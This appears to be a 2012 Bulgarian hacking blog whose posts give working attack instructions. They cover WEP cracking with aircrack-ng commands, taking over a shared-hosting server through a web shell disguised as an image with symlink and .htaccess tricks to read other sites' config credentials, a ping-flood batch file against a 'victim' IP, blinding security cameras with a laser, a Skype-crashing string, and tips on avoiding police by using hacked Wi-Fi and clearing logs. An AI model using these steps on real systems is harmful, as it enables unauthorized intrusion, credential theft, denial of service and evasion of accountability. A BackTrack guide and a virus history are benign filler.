вторник, 21 февруари 2012 г.

Част №2 Wireless мрежи - WEP



Сега вече можем да преминем към същественатачаст от нашата задача.Първо стартирайте Back Track и отворете терминаленпрозорец.След това напишете airmon-ng за да видите интерфейсите накартата в моя случаи това е wlan0 с командата airmon-ng start wlan0 ние преминаваме към монитор мод на дадения интерфейс.

След това използваме командата airodump-ng за да сканираме за мрежи.Както виждате имаме налична мрежа с името SKIDHACKER важно е да се отбележи BSSID , канала , вида криптиранесега ще покажем как става с WEP






Сега използваме командата airodump-ng -c (канал) -w WEPcrack --bssid (bssid на мрежата) wlan0 ето и какво представлява тази команда започваме да сканираме конкретната мрежа -c отбелязваме канала -w посочваме къде да се запише информацията –bssid посочваме коя точно мрежа да сканира ,а wlan0 е инферфейса
 
Отворете нов терминал и напишете следната команда за да започне по-бързото събиране на дата пакети aireplay-ng -1 0 -a (bsisd) wlan0 сега ако всичко е наред трябва да ви изпише Association successful :-)
Следващата команда която трябва да използвате във същия прозорец е
 aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b (bssid) wlan0 когато ви попита дали искате да я използвате напишете Y и ентер.
След като съберете дадено количество дата пакети (препоръчвам над 20 000 ) напишете следната команда aircrack-ng WEPcrack*.cap името може да е различно това е използвано в примера . Ако не стане от първия път изчакайте повече пакети.



Когато се покаже този резултат KEY FOUND! [ XX:XX:XX:XX:XX ] значи всичко е готово X е паролата и ако като пример получите 11:22:33:44:55 то паролата е 1122334455 без : .

Моля използвайте получената информация само за учебна цел .В следващата статия ще разберете как става с WPA 






Част №1 Wireless мрежи


Напоследък достахора използват wireless връзказа своите нужди. Тя става все по-популярна в България и по света.Тенденциите сатя да се развива от към скорост и обхват. Вече дори и мобилните операторипредлагат такава  ,но за жалост е твърдеслаба.Смятам ,че тази интернет връзка трябва да е свободна за всичкипотребители и да има повече места където можете да сте в мрежата като напримерпаркове , пред някой магазин , пред някой блок дори когато вървите из целияград в които живеете.В тази статия ще ви покажа няколко метода които можете даизползвате за мрежа която има парола.В интернет има доста такива статии ,но щесе опитам да вдигна малко нивото като се опитам да направя един разбираем  урок и ще изтъкна проблемите които можете даимате при изпълнение на урока от тази статия.Незабравяйте ,че това е незаконнои го използвайте само с учебна цел.
Въведение
Wireless мрежа ебезжична и всички потребители които имат достъп до нея се наричат Stations(станции) , те могат да са accesspoints ( APs ) или клиенти .APsса компютрите предоставящи тазивръзка рутери  ,те получават информацията с която комуникиратев интернет.Всичките станции комуникират със себе си посредством BasicService Set ( BSS).Всеки BSS има идентификация която се нарича BSSID, също така наречена MAC адрес ,който е уникален за всяка карта.За да сте вързани към мрежата виетрябва също така да знаете нейното име което е SSID за да можете да получавате и изпращате пакети закомуникация.
Криптиране на Wirelessмрежа
Два са основнитеметода за криптиране WEP и WPA/2. WEP е съкратено от WiredEquivalent Privacy  и е с 3 различни по дължина ключове които са64 , 128 и 256 бита съответно WEP64/128/256 . Предлага добра сигурност ,но е доста остарялметод съответно и по-лесен за разбиване.Всеки WEP ключ има 24 инициализиращи вектора  ( IV ) . WEP също така може да бъде WEP2 и WEP+  които не са толкова лесни както стандартния WEP. WPA ( WiFi Protected Access ) се появява по-късно за да подобри защитата намрежите  които преди това са използвали WEP . WPA прави собствена различна парола за всеки клиент ,но доста често се пуска не като защита разбира се pre-shared key ( PSK ) мод при които всеки клиент има една исъща парола.
Основни проблемипри разбиването на Wireless парола
WEP криптиранапарола не би затруднила дори и 13 годишен със сравнително не големипознания  ,но има своите изисквания за дабъде разбита паролата трябва да има трафик в дадената wireless мрежа за да намерите бързо векторите и даполучите паролата .Доста често хората се отказват  като мислят ,че проблема е някъде притях.Също така е желателно да имате добър сигнал към тази мрежа  ( 1 черта не е добър сигнал ) .
WPA основнияпроблем там  е ,че за да проникнете втакава мрежа ви е нужен файл наречен wordlist в повечето случаи се прави собствен такъв или сенамира от интернет големината му варира от 100 mb до 100 и повече GB . Какво представлява файла , ами това е файл съскомбинации пароли  и обработването муможе да бъде доста дълго зависимост от вашият компютър и програмите коитоизползвате.Друг метод е да bruteforce-нете паролата това е когато пробвате всяка една комбинация която евъзможна.Искам да дам следния пример : парола WPA криптирана от 8 символа  има 64 на 8ма степен комбинации.Това прави64*64*64…….= 281 474 976 710 656 това са 281 трилиона комбинации със програматакоято ви показват в други уроци  нареченаaircrack вие можете дапостигнете скорост от 1500-3000 пароли в секунда ( зависи от компютъра ) . Запримера ще използваме 3000 пароли в секунда  * 60 * 60 * 24 * 30 … за един месец можете даобработите 7 776 000 000  . 7 милиардапароли спрямо числото 281 трилиона комбинации. Сигурно вече съвсем серазубедихте , но не се отчайте има програми с които може да се постигнат имного добри резултати като например Pyrit  ,койтодостига скорост от 50 000 пароли в секунда до 150 000 . Използва вашата видеокарта и е един от най-добрите методи.

Какво ще ни енеобходимо да използваме
В тази статия щепокажа  двата най-често използваниметода  за WEP и WPA чрез Backtrack  вече сигурно сте прочели статията как да гоинсталирате на преносим източник или на вашият твърд диск .Подходяща wirelessкарта  ,повечето нови карти са добри за тази цел.Търпение и нищо друго.

неделя, 19 февруари 2012 г.

Хакерски сайт игра - Играйте и учете едновременно

В днешната статия искам да ви покажа един много хубав сайт в които се регистрирах преди време.Много е интересна тематиката на сайта.Той представлява игра в която вие сте хакер и ви се дава дадена мисия.Разделени са на нива като се започва от най-лесното ще са ви нужни някой допълнителни plugins за мозила които са ви необходими.Ако се затруднявате с някоя от задачите има много сайтове в google където ви дават подробно как се минава конкретната мисия ,а също така и в youtube има клипове. Регистрирайте се и се забавлявайте ТУК

Backtrack – От А до Я част 1

Официален сайт на Backtrack ТУК


Напоследък достазачестява интереса към тази не толкова популярна операционна система и реших данапиша подробен урок какво представлява Backtrack , как се инсталира , за какво се използва , каквипрограми съдържа и друга полезна информация за тази уникална операционнасистема.

1.Въведение – Backtrackе операционна система базирана на UbuntuGNU/Linux  използва се от мрежовиадминистратори, собственици на сайтове,хакери и хора които искат да научат повече за Linux. Backtrack е проект обединен от две организации коитосе занимават с penetration testing.

2.Инсталация –Може да бъде инсталиран на вашият твърд диск и да работи заедно с Windows, а също така и да се работи с негодиректно от USB флашпамет  (изискване да е над 4GB ) .

2.1 Инсталациядиректно на твърдия диск
Това енай-простия метод за инсталация когато целия твърд диск е изцяло за BackTrack.
Boot-нете BackTrack за да се инсталира . След катосте го заредите с командата startx получавате KDE графиченинтерфейс.
След като вечесте го заредили двоен клик с левия бутон на мишката върху install.sh или въведете в терминален прозорецкомандата ubiquity

Изберетегеографско положение и натиснете forward


Следващото меню еотносно дяловете на твърдия диск изтрийте всички и започнете инсталация на BackTrack . Следвайте стъпките които садоста лесни и след приключване на инсталацията рестартирайте.Стандартнатапарола и username в Backtrackса root / toor . 

2.2 Инсталация наLIVE USB -  За целта трябва да имате флаш памет минимум 4GBформатирана с FAT32. Свалете програмата от ТУК казва се unetbootin. Изберете ISO файла на Back Track ( съвет : изберете последна версия ) . Изберете USBустройството което мислите даизползвате . Паролата за backtrack е същата командата за графична среда е startx .

3.Списък с основни програми които са включени в Backtrack


Metasploit
RFMON
 Aircrack-NG
Kismet
Nmap
Ophcrack
Ettercap
Wireshark
BeEF
Hydra
OWASP Mantra Security Framework - огромна колекция от програми / скриптове  и друго

BackTrack разделен в 12 категории:
Information Gathering
Vulnerability Assessment
Exploitation Tools
Privilege Escalation
Maintaining Access
Reverse Engineering
RFID Tools
Stress testing
Forensics
Reporting Tools
Services
Miscellaneous

събота, 18 февруари 2012 г.

Как да забраним даден сайт

Много често познати които са родители и се притесняват за децата си каде се ровят в нета и се страхуват да не попаднат на материали за възрастни ме питат как да се предпазят от това.Има доста програми за тази цел ,но сега ще предложа един метод ,който е много лесен дори за човек без особени познания в тази област да забрани дадени сайтове.
Следвайте тези инструкции :
1.Отворете папката C:\WINDOWS\system32\drivers\etc
2.Намерете файл с името HOSTS
3.Отворете го с notepad
4.Сега в файла под реда 127.0.0.1 localhost добавете нов ред 127.0.0.2 http://www.facebook.com
5.Запазете файла със Save
Сега се опитайте да отворите страницата на facebook :) Ако нестане значи сте се справили отлично

Как да разберем вида на дадена Hash парола

В днешната статия ще ви покажа много хубава програма абсолютно безплатна с която можете да разберете вида на дадена парола как е криптирана няма да се впускам в дълги пояснения за програмата защото тя е доста лесна ще дам само screenshot и линк за връзка

Линк за програмата : ТУК

Паролата за архива е първата дума когато гласувате в БГТОП без пунктоационен знак.

Как хакерите хакват всичко от А до Я


Повечето от тяхса деца които използват готови завършени грешки ,но има и такива които самиоткриват грешки в дадена система.

Първото инай-важно нещо е да изберете вида на атаката която ще използвате най-често тя еSQLi  има много сайтове с грешки .И лесно се намират с гоогъл . Можете да прочетете повече за този вид атака ТУК

Намирате сайт в  ,който има SQLi уязвимост

Да предположим ,че в конкретния сайт няма грешка но ние искаме да го хакнем още е рано да се отчаяме.На дадена машина доста често се срещат 2 и повече сайта.Можете да проверите тези сайтове като въведете това ip:22.333.444.555 id=  в bing.com или google.com ще излезнат сайтове всички сайтове които са качени на този компютър.Ще останете изненадан от резултатите.

С методите които сигорно вече сте прочели трябва да си набавите достъп и да се логнете като администратор на сайта.

Следващата стъпка е да качите шел има много начини и за всяка система начина е различен вие трябва да търсите информация как точно става за конкретната система най-често се сменя името на шела да бъде с разширение .jpg и когато го качим го променяме на .php защото доста сайтове имат защити от upload на такъв код. 

При Root на дадена машина трябва да се премахнат всички възможни защити скоро ще пусна статия как става това.

Много важно нещо е да знаем  версията на линукс можем да я проверим с командата  uname -a

Трябва да намерите локален експлойт за дадената версия можете да проверите тук

Следващата важна стъпка е да влезнете в shell-a и да напишете тази команда 
cat etc/passwd този файл съдържа всички username-и на хоста те не са дълги както е името на саита  ,а са нещо от рода на  сайт1 сайт2 сайт3

Основна цел след това ви е да получите конфигурационния файл на системата ето места където се намира той при някои системи.


vBulletin -- /includes/config.php
 IPB -- /conf_global.php
 MyBB -- /inc/config.php
 Phpbb -- /config.php
 Php Nuke -- /config.php
 Php-Fusion -- config.php
 SMF -- /Settings.php
 Joomla -- configuration.php , configuration.php-dist
WordPress -- /wp-config.php
 Drupal -- /sites/default/settings.php
 Oscommerce -- /includes/configure.php
 e107 -- /e107_config.php
 Seditio -- /datas/config.php

След като сте получили пътя до база данните основна цел ви е да извлечете базата данни

Нека приемем ,че сте в директорията /home/attacker1/public_html/shell.php  attacker1 е username-а на някакъв хост.Пътят до жертвата е нещо от рода на /home/victim1/public_html/ и victim1 е вашето име на жертвата.Сега ползваме тази команда в шела като приемаме ,че системата е vBulletin :
ln -s /home/victim1/public_html/includes/config.php victim1.txt

Тази команда използва symling ( ускорява работата на линукс сървъри ) и казва на сървара : хей дай ми този файл и го запиши като victim1.txt .Сега когато изпълним това можем да видим конфигурационния файл на този адрес attacker1.com/victim1.txt  .Много администратори слагат защита на техните сайтове / форуми която ще пробием след малко.

Htacces. - Администратора на сайта victim1.com може да е сложил htacces file в папката /includes

order allow, deny
deny from all

Когато се опитаме да копираме ще получим грешка 403 Forbidden Error. Как ще го преминем.Ами правим папка примерно "asd",влизаме вътре с командата cd /asd След това прилагаме symling ln -s /home/victim1/public_html/includes/config.php victim1.txt

Получаваме 403 Forbidden Error . Сега трябва да сложим htaccess файла в директория преди "asd"за пример ако ние сме в /home/attacker1/public_html/asd и ние трябва да сложим htaccess в предишна папка в /home/victim1/public_html/" . В htaccess файла трябва да напишете HeaderName victim1.txt

Сега насочваме към "home/attacker1/public_html/asd и кликаме на victim1.txt и трябва да ни зареди конфигурационния файл.

Ако ви е писнало от всички преминавания на защити ще ви покажа хубав метод с които да преминете през всички.
Следвайте този пример:
Спряли сме всички защити,но все още неможем да направим symlink правилно.Какво да правим.
Първо правим папка с произволно име примерно hack . Влизаме вътре през шела и пишем вътре "ln -s / root" . След това избираме домейн адреса на жертвата например victim1.com . Пишем "ls -la /etc/valiases/victim1.com" .Сега се насочваме една папка назад и слагаме този htaccess файл в папката hack :

Options Indexes FollowSymLinks
DirectoryIndex test.htm
AddType txt .php

AddHandler txt .php.
Сега ако сме в "home/attacker1/public_html/" това е равно на "attacker1.com" . Затова искаме да насочим към папката " hack " и пишем в URL attacker1.com/hack и ние виждаме папка която всъшност е symlink връзка наречена root . Не се радвайте още , имаме ограничени права в същата папка . Сега минете през attacker1.com/hack/root/home/victim1/public_html/ 
Сега можете да разглеждате сайта без да се тревожите от ограниченията по IP адрес с htaccess файл. Дори да е там htaccess няма проблем защото вие сте въвели username и парола , трябва да намерите начин  да преминете това . След като стигнете до конфиг файла не се отчайваите ако видите празна страница десен бутон и view source . 

Как да Flood-нем компютър без никакви програми

Всичко е много просто и обяснено в 4 стъпки

1.Отваряте Notepad

2.Пишете " Ping -t -l 7500 (Ip адрес на жертвата) "   -t ще пуска пинг докато не бъде спряно -l е размера на Пинг пакета . Ip адреса се сещате какво е :)

3.Записвате текста с разширение .bat  пример :  flooder.bat

4.Пускате го и гледате резултата ако не е особено добър можете да увеличите размера на пакетите

Не очаквайте особени резултати това е обикновен пинг ,но е достатачно да забави и изнерви някои в Wireless мрежа :) Очаквам вашите коментари Благодаря за прочетената статия.

Как да обезвредим камера


Моля използвайтематериала само и единствено за образователна цел

Първото нещокоето ни трябва е зелен лазер 5 mW  като ТОЗИ тук след това насочвате лазера за около 10 секунди в обектива накамерата . Не рискувайте с повече най-вероятно ще я повредите  имате около 30 секунди докато възстановиспособностите си да вади образ . 



петък, 17 февруари 2012 г.

Анонимните заплашиха да спрат интернет в целия свят

Хакерската група "Анонимните" заплаши да спре интернета в целия свят на 31 март, съобщи сайтът webpronews.

Операцията "Глобално затъмнение" обещава да удари 13-те DNS сървъра, които представляват основата на световната мрежа.

Атаката ще бъде извършена чрез софтуер, който нарушава работата на тези сървъри. Когато те не могат да отговорят на запитвания за т.нар. система за имената на домейните (DNS), потребителите не могат да отворят желаните страници и смятат, че интернетът "не работи".

Протестът този път е насочен срещу СОПА, Уолстрийт, безотговорните правителства и банкерите, които от егоизъм и чист садизъм са довели света до гладна смърт, се казва в изявление на групата.

От webpronews отбелязват, че не могат да гарантират достоверността на заплахата. От там са поискали коментар от малкото потвърдени "Анонимни", но все още няма потвърждение.

Експерти пък се съмняват, че акцията ще бъде успешна. 13-те DNS сървъра са разположени по целия свят. Всеки от тях на практика представлява разклонение от множество сървъри с общ IP адрес. В системата по този начин са свързани общо 259 сървъра към различни провайдъри.

Източник: expert.bg

Как да хакваме и да не ни хващат

Първо искам да започна с това ,че в предишна статия споменах няколко програми които доста добре ни правят донякаде анонимни в интернет ТУК .
Но това което сте прочели в предишната статия не е напълно достатачно.Така ето и няколко съвета от мен дано ви бъдат от полза.

1.Никога не оставяйте никакви следи в интернет които могат да доведат полицията до вас.Доста често остават Логове по компютъра , Логове във VPN мрежата и други.Подсигурете се да изтриете всичко което може да наруши вашата анонимност.

2.Мързела доста често е една от причините да бъдете хакнат независимо какво се има впред.Използвайте хубави проксита и VPN сървъри и ЗАДЪЛЖИЛНО ... НИКОГА АБСОЛЮТНО НИКОГА не правете нищо незаконно от ваш интернет.Отделете малко време и изпиите едно кафе в някое интернет кафе , заведение , или пред някой блок където сте намерили безплатен или хакнат от вас Wireless.

3.Запомнете ,че в повечето случаи когато даден саит или важен акаунт бъде хакнат собственика му може да провери вашето ISP и да получи информация за вас

4.Повечето хора които отскоро се занимават в повечето случаи искат да станат доста бързо известни и да се прочуят в средите и забравят за собствената си безопасност в повечето случаи от мързел и бързане.

5.Никога не споделяите на публично места вашите изяви , понякога и стените имат уши и никога незнаете човека ,който стои близо до вас какво работи.

6.Използваите псевдоним с ,който ви знаят само най-близките и доверени хора.

7.Не си правете срещи с непознати от интернет ако не сте на 100% убедени в тях.

8.Не хакваите за щяло и нещяло изградете си цели.Повечето хакерски групи имат мотив и цел към която се придържат и никога не бягат от целта.Ако компютърат ви е хакнат тои него е направил защото иска да ви навреди ,а иска да помогне на себе си и да навреди на други хора.Естествено последното е изключение ако имате 1000$ в пейпал и се чудите какво да ги правите тогава той би ви помогнал да ги изхарчите.

9.Запомнете най-важното Хакери винаги е имало в затвора и винаги ще има всичко зависи от вас.

Ето как да изтриете логовете в Windows :
Start > Control Panel > Administrative Tools > Event Viewer > Clear All Events

четвъртък, 16 февруари 2012 г.

Топ 10 на най-лошите компютърни вируси!

Компютърните вируси могат да бъдат истински кошмар. Някои могат да изтрият информация от хард диска ви, да натоварват мрежовата ви връзка с часове, да превърнат обикновена машина в зомби и да се множат и разпространяват по останалите компютри. Ако никога не сте ставали жертва на компютърен вирус, може да се чудите за какво е всичко това. Но загрижеността е разбираема – компютърните вируси са довели до $8.5 милиарда загуби през 2008 г. Те са един вид онлайн заплаха.



Компютърните вируси съществуват от много години. Всъщност, през 1949г. учен на име Джон вон Нюмън изгражда теорията, че саморазмножаваща се програма е възможна. Компютърната индустрия е била на няма и десет години и вече някой е открил как да и създава проблеми. Но все пак отнема няколко десетилетия преди програмисти, познати като хакери, да започнат да правят вируси.

Студентът Фред Коен е бил първият, описал саморазмножаващите се програми, направени за да модифицират компютрите като вируси. От там идва и названието им.

В добрите стари времена вирусите са зависели от хората за да се разпространят на други компютри. Хакер записва вирус на диск и тогава разпространява дискът на други хора. Прехвърлянето на вируси не е било истински проблем до преди появата на модемите. Днес ние мислим за компютърния вирус като за нещо, което се прехвърля по интернет. Може да зарази компютри чрез електронната поща или уеб адреси. Такива програми могат да се разпространяват много по-бързо от ранните компютърни вируси.

Ще разгледаме 10-те най-лоши компютърни вируса.

10: Melissa

През пролетта на 1999г, Дейвид Л. Смит създава компютърен вирус базиран на Microsoft Word macro. Той прави вируса, така че да се разпространява чрез съобщения по електронната поща. Смит кръщава вирусът „Мелиса” на екзотична танцьорка от Флорида.

Мелиса кара получателите си да отворят документ с имейл съобщение като „Ето документа, който искаше, не го показвай на никой друг.” Веднъж активиран, вирусът се размножава и изпраща себе си на първите 50 човека от имейл адресите на жертвата.

Разпространява се бързо след като Смит го пуска по света. ФБР започва да се интересува от работата на Смит – според тяхно изявление, вирусът Мелиса „ причинява щети на правителствени и частни мрежи”. Увеличаването на имейл трафикът принуждава някои компании да спрат програмите си.

След доста дълъг процес, Смит губи делото си и получава присъда от 20 месеца затвор. Съдът глобява Смит и с $5000 и му забранява достъп до компютър без разрешението на съда. В края на краищата вирусът Мелиса не нанася непоправими големи вреди на интернет, но е един от първите компютърни вируси, получил публичност.

9: ILOVEYOY

Една година след Мелиса, дигитална заплаха тръгва от Филипините. За разлика от Мелиса, тази заплаха идва под формата на червей – тя е самостоятелна програма, способна да се размножава сама.

ILOVEYOU първоначално пътува по интернет чрез имейли. Заглавието на имейла казвало, че това е любовно писмо от таен обожател. Прикрепеният файл в писмото е причината за проблемите. Оригиналният файл на червеят е имал име LOVE-LETTER-FOR-YOU.TXT.vbs. Окончанието .vbs сочи и езикът, използван от хакера за да създаде червея: Visual Basic.

Според антивирусния софтуеър на McAfee, ILOVEYOU атакува по различни начини:

Копира себе си няколко пъти и скрива копията в папки на компютъра на жертвата.
Добавя нови регистри.
Замества няколко различни вида файлове с копия на себе си.
Изпраща се чрез IRC и email.
Изтегля файл с името WIN-BUGSFIX.EXE от интернет и го активира. Вместо да оправя грешки, тази програма краде пароли, които изпраща тайно на имейл адреса на хакера.



Кой е създал ILOVEYOU? Някои смятат, че е Онил де Гузман от Филипините. Властите разследват Гузман по обвинения в кражба – по това време Филипините нямат закони против компютърен шпионаж или саботаж. Поради липса на доказателства обвиненията отпадат, като Гузман нито отрича, нито потвърждава отговорността си за вируса. Според някои изчисления, вирусът е причинил щети за $10 милиарда.

8: The Klez Virus

Klez маркира нова посока за компютърнтие вируси, поставяйки летвата на високо за тези след него. Дебютира в края на 2001 г. а вариации на вируса плъзват из интернет няколко месеца по-късно. Червеят Klez заразява компютъра на жертвата чрез имейл съобщение, размножава се и се изпраща сам на адресите от електронната поща на жертвата. Някои разновидности на вируса вървят с други вредни програми, които могат да повредят компютъра на жертвата. В зависимост от версията, Klez може да се държи като нормален компютърен вирус, червей или като троянски кон. Може дори да изключи антивирусна програма и да се прави на такава.

Малко след като се появява в интернет, хакери модифицират Klez по начин, който го прави още по-ефективен. Като другите вируси може да се прихване от електронната поща и да се саморазпраща . Но може и да вземе друго има от списъка с контакти и да го използва като име, от което се изпраща. Това се нарича spoofing – имейлът изглежда, че идва от един източник, а всъщност е от съвсем друг.

7: Code Red и Code Red 2

Това са червеи, появили се през лятото на 2001 г. И двата проникват в операционната система, чрез уязвимост в Windows 200 и Windows NT. Уязвимостта била пренатоварване на буфера, което означава, че компютрите с тези операционни системи получават повече информация, от колкото могат да поемат.

Оригиналният Code Red червей осъществявал DDoS атаки над Белия дом. Тоест, всички заразени компютри се опитват да се свържат със сърварите на Белия Дом едновременно, което претоварва машините.

Компютър с Windows 2000, заразен от Code Red 2 червея спира да се подчинява на собственика си. Червеят създава вратичка в операционната система на компютъра, което позволява на отдалечен потребител да управлява машината. Това е риск от системно ниво и е лоша новина за собственика на компютъра. Човекът зад вируса има достъп до информация от компютъра на жертвата и дори може да използва заразеният компютър за да извършва престъпления. Това означава, че собственика не само трябва се справи със вируса, но и може да попадне под ударите на закона за престъпления, които не е извършил.

Microsoft пускат пач за уязвимостта в Windows 2000 и Windows NT. След пачването, червеите вече не могат да заразят компютрите, но не премахва вирусите от вече заразените.

6: Nimda

Още един вирус от 2001 г. Нимда (Админ на обратно) се разпространява бързо по интернет, като става най-бързо разпространяващия се вирус по това време. Според TruSecure, на червеят му отнемат 22 минути за да влезе в топ списъка на вирусните атаки. Червеят Нимда атакува интернет сърварите. Въпреки, че може да зарази и домашен компютър, истинското му предназначение било да претовари интернет трафика. Може да се разпространява по интернет по няколко начина, включително по електронната поща. Това му помага да се разпространи по множество сървари за рекордно време. Вирусът създава вратичка в операционната система на жертвата. Това позволява на човека, стоящ зад атаката да получи достъп на ниво, равно на това, което има текущият потребител на компютъра. Тоест, ако потребител с ограничени права активира червея, атакуващия ще има същите ограничени права над машината. Ако жертвата има администраторски права, това означава пълен контрол.

5: SQL Slammer/Sapphire

През Януари 2003г. нов вирус се разпространява по уеб сърварите в интернет. Много от компютърните мрежи не били подготвени за атаката и в крайна сметка вирусът удря няколко важни системи. Срива се системата на Американската банка, спира номерът 911 и континентални авиолинии отменят няколко полета поради грешки при електронните билети. Виновникът за това бил SQL Slammer вирусът, познат още като Sapphire. Според някои изчисления е причинил щети за над $1 милиард преди антивирусните системи да се справят с проблема. Прогресът на вируса е добре документиран. Само няколко минути след като заразява първия интернет сървър, вирусът Slammer поразява и почти половината сървъри, на които се държи интернет.

4: MyDoom (Моят кошмар)

MyDoom (или Novarg) е друг червей, който може да създаде вратичка в операционната система на компютъра. Оригиналната му версия (има няколко различни версии) има две действия. Първото кара вирусът да започне DoS атака на 1 Февруари 2004г. Второто действие спира разпространението на вируса на 12 Февруари 2004г. Дори след спирането му, вратичките, създадени по време на заразата остават активни.По-късно същата година, втора атака на MyDoom срива няколко търсачки. Като останалите вируси, той търси имейл адреси в електронната поща на жертвата за да се разпространява. Но може и да изпраща заявки в търсачките и да използва откритите в резултатите имейл адреси. Търсачки, като Google започват да получават милиони заявки от заразени компютри. Тези атаки претоварват системите им и дори някои се сриват. MyDoom се разпространява чрез електронната поща и p2p мрежите. Според фирмата MessageLabs, едно от всеки 12 електронни съобщения съдържал вируса по това време.

3: Sasser и Netsky

Понякога създателите на компютърните вируси успяват да останат незаловени. Но от време на време властите намират начини да проследят вируса до създателя му. Такъв е случаят с вирусите Sasser и Netsky. 17 годишният германец Sven Jaschan създава двете програми и ги пуска в интернет. Въпреки, че двата червея се държат по различен начин, сходности в кода карат експертите да смята, че са дело на един и същ човек. Вирусът Sasser атакува компютрите чрез уязвимост в Microsoft Windows. За разлика от останалите червеи, той не се разпространява по електронната поща. Вместо това щом веднъж зарази компютър, той търси други уязвими системи. Свързва се с тези системи и ги кара да изтеглят вируса. Вирусът може да сканира произволни IP адреси за да открие потенциални жертви. Той изменя и операционната система, така че прави трудно изключването на компютъра без да се налага да му се дърпа щепсела. Вирусът Netsky се разпространява по електронната поща и Windows мрежите. Търси имейл адреси и се размножава чрез 22, 016 байтов прикачен файл. Може да изпълнява DoS атаки като така срива системите, които се опитват да понесат интернет трафика. Свен не влиза в затвора, а получава година и девет месеца пробация. Понеже не е бил пълнолетен не е съден като възрастен.

2: Leap-A/Oompa-A

Може би сте виждали рекламата на Apple Mac с Джъстин Лонг и Джон Ходжмън. Ходжмън посочва, че има повече от 100 000 вируса, които могат да поразят компютъра ви. Той казва, че тези вируси са предназначени за персоналните компютри, а не за Mac компютрите. До голяма степен това е вярно. Mac компютрите са от части защитени от вирусни атаки заради нещо наречено защита чрез неяснота. Apple има репутацията да пази операционната си система и хардуера затворена система – Apple произвеждат и хардуера и софтуеара. Това прави операционната система скрита. Mac компютрите не са толкова широко разпространение като персоналните на пазара. Хакер, който прави вирус за Mac няма да има толкова жертви, колкото би имал при персоналните компютри. Но това не е спряло поне един хакер. През 2006г., вирусът Leap-A, познат още като Oompa-A, се появява. Той използва iChat програма за съобщения за да заразява уязвими Mac компютри. Той търси в адресите на чата и изпраща съобщение на всеки от списъка. Съобщението съдържа зловреден файл, който изглежда като обикновено JPEG изображение. Leap-A не причинява големи щети, но показва, че дори и Mac компютрите могат да се заразят с вируси.

1: Storm Worm

Последният вирус в класацията ни е ужасният Storm Worm. Компютърните експерти по сигурността за първи път идентифицират червея през 2006 г. Хората започват да наричат вируса Storm Worm, защото едно от имейл съобщенията, носещи вируса има заглавието „230 жертви след буря в Европа.” Антивирусните компании го наричат с други имена. Symantec го наричат Peacomm, а McAfee пък Nuwar. Може да звучи объркващо, но има вирус 2001, наречен W32.Storm.Worm. Вирус 2001 и Storm Worm от 2006г. са две напълно различни програми. Storm Worm е троянски кон. Активира се от друга програма, която не е винаги една и съща. Някои версии на вируса превръщат компютъра в зомбита или ботове. Когато компютърът се зарази, той става уязвим на контрол от разстояние от човекът, изпратил вируса. Някои хакери използват Storm Worm за да създадат botnet и с него да изпращат спам съобщения по интернет. Много версии на троянския кон измамват жертвата да изтегли програмата чрез фалшиви връзки на сайтове за новини или видео клипове. Изпращащите вируса обикновено сменят заглавието на съобщенията, така че да отразява текущи събития. Например точно преди олимпийските игри в Пекин през 2008г., нова версия на червея се появява в електронните пощи със заглавия като „нова смъртоносна катастрофа в Китай” или „Най-смъртоносното земетресение в Китай”. Съобщението посочва връзка към видео клип или новини, свързани със заглавието, но когато го отворите се активира изтеглянето на червея. Няколко новинарски агенции и блогове посочват Storm Worm като една от най-лошите вирусни атаки от много години насам. През Юли 2007г. официално компания Postini твърди, че е засякла повече от 200 милиона имейл съобщения, съдържащи връзки към Storm Worm по време на атака, продължила няколко дни. За щастие не всяко съобщение е довело до изтеглянето на вируса.

Въпреки че Storm Worm е доста разпространен, не е особено трудно да се засече или премахне от компютърната система. Ако обновявате антивирусната си програма редовно и внимавате, когато получавате имейли от непознати хора или видите странни връзки, ще се спасите от подобни проблеми.

Източник: http://iskamdaznam.com/

Skype crasher - Как да изхвърлите някой от скайп

Skype crasher - Името на програмата говори сама за себе си . Става въпрос за малка програма която при натискане на един бутон и при маркиране на чата с даден събеседник му изпраща код и той получава серия от 2-3 грешки след което скайп-а му се затваря.Тази програма НЕ хаква скайп тя просто дава грешка на събеседника доста е добра за забавление , но не виждам нищо сериозно в нея.
Линк за програмата : ТУК
Вирус скан : Тук

Преди да изкажете мнение програмата не работи моля да я тествате.Аз я проверих и работи идеално за жалост я проверих в конферентен разговор и се наложи да направя нов понеже незнам как се спира ефекта.

Работи на принципа спан на този код : : ส็็็็็็็็็็็็็็็็็็็็็็็็็ส็็็¬¬็็็็็็็็็็็็็็็็็็็็็็ส็็็็็็¬็¬็็็็็็็็็็็็็็็็​​​​​็็ส็็็็็็็็็¬็็¬็็็็็็็็็็็็็็ส็็็็็็็็็็็็-็็็¬็็็็็็็็็็ส็็็็็็็็็็็็็็็¬็็็็¬็็็็็็ส็็็็็็็็็็็็็็็็็็¬็็็็็¬็็ส็็็็็็็็็​​​​​็็็็็็็็็็็็¬็็็็ส็¬็็็็็็็็็็็็็็็็็็็็็็็¬็ส็็็็็-็็็็็็็็็็็็็็็็็็็็ส็¬็็็็็็็็¬็็็็็็็็็็็็็็็็ส็็็็¬็็็็็็็็็-็็็็็็็ ็็็็็ส็็็็็็็¬็็็็็็็็็็¬็็็็็็็็ส็็็็็็็็็็¬็็็็็็็็็็็¬็็็็ส็็็็็็็็็็็็็¬็็็็​​​​​็็็็็็็็¬ส็็็็็็็็็็็็็็็็-็็็็็็็็็ส็็็¬็็็็็็็็็็็็็็็็¬็็็็็็ส็็็็็็็¬

Няколко съвета, които могат да ви спестят неприятности. #2

Няколко съвета, които могат да ви спестят неприятности. #2 

Темата не е моя , но е тук с разрешението на автора "Necrosis" (cwi-group.org/) ! 

Част 2-ра .  Първа част може да бъде видяна ТУК

Реших да продължа дългите писания от миналият ми пост в нова тема. Тук вече ще се запознаем малко по-обширно с начините за крадене на данни и как да се предпазим от тях.

Що е то вирус ? - когато някой каже „компютърен вирус”, всички се сещат за тези файлове които се записват на вашият компютър - без ваше разрешение, стартират се и се разпространяват без ваше разрешение. Вирусите са злонамерени файлове, чиято цел е краденето на данни. В последно време най-активно разпространените вируси са базирани на кейлогърите и ратовете.
Какво е кейлогър (keylogger) - може би се досещате, само като видите името. Това е вид вирус, който записва всичко което жертвата въведе на клавиатурата си - от чат до пароли.
Какво е рат (rat) - плъховете са наистина доста коварни вируси. Тяхната цел е да вземат колкото се може повече информация от компютъра на жертвата. Различните видове ратове имат различни функции - едни могат да правят скрийнове, други могат да следят компютъра на жертвата денонощно.
Интересното е, че и ратовете и кейлогърите се записват под .exe разширение, което ги прави функциониращи само под операционната система Windows.
